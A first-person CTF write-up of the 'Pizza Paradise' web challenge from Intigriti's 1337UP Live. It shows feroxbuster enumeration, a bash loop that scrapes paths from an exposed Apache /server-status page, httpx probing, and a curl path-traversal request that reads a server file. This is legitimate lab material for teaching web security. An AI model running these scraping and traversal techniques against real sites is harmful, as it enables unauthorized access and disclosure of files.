Last weekend I did some challenges at the 1337UP Live CTF organized by the bug bounty platform Intigriti. As I was reading other peoples solutions I noticed that I solved one of the web challenges differently, which made me decide to do a writeup about it.

Pizza Paradise

The challenge was a web application that that shows a pizza store

pizza_ctf

The site did not have too much functionality so I decided to spin up feroxbuster to find hidden endpoints.

feroxbuster -u https://pizza-paradise.ctf.intigriti.io/
200      GET       79l      199w     3115c https://pizzaparadise.ctf.intigriti.io/
301      GET        7l       20w      253c https://pizzaparadise.ctf.intigriti.io/assets => http://pizzaparadise.ctf.intigriti.io/assets/
200      GET        3l        6w       89c https://pizzaparadise.ctf.intigriti.io/server-status
...

The most interesting endpoint was /server-status, which is a debug page from the Apache HTTP server that shows information about the server status. It also shows HTTP logs of the server.

pizza_server_status

I’ve seen such a misconfiguration before at a Bug Bounty program so I already had a bash oneliner laying around that continuously scrapes these logs in the hope to find some interesting endpoints.

while true; do curl -s -k "https://pizzaparadise.ctf.intigriti.io/server-status" | grep "nowrap" | sed -n 's/.*GET \([^ ]*\).*/\1/p'; done | anew paths.txt

After running it for a minute I stopped it and ran all the paths through httpx to find out which urls are working.

echo "https://pizzaparadise.ctf.intigriti.io" | httpx -sc -title -fc 404 -path "paths.txt"

This gave me a list of endpoints that returned a 200 status code.

https://pizzaparadise.ctf.intigriti.io/server-status [200] [Apache Status]
https://pizzaparadise.ctf.intigriti.io/health.html [200]
https://pizzaparadise.ctf.intigriti.io/ [200] [Pizza Paradise | The Best Pizza in Town]
https://pizzaparadise.ctf.intigriti.io/login.php [200]
https://pizzaparadise.ctf.intigriti.io/topsecret_a9aedc6c39f654e55275ad8e65e316b3.php [200] [Top Secret Portal]

The /topsecret_a9aedc6c39f654e55275ad8e65e316b3.php endpoint was the one I was looking for, entering it through the browser shows a page with a download functionality.

pizza_topsecret

The page had a functionality to download images, using the url https://pizzaparadise.ctf.intigriti.io/topsecret_a9aedc6c39f654e55275ad8e65e316b3.php?download=image.png, this filepath was not properly checked and was vulnerable to path traversal attacks. The flag could be found with the following request

curl https://pizzaparadise.ctf.intigriti.io/topsecret_a9aedc6c39f654e55275ad8e65e316b3.php?download=/assets/images/../../../../../../../../../../../../var/www/html/topsecret_a9aedc6c39f654e55275ad8e65e316b3.php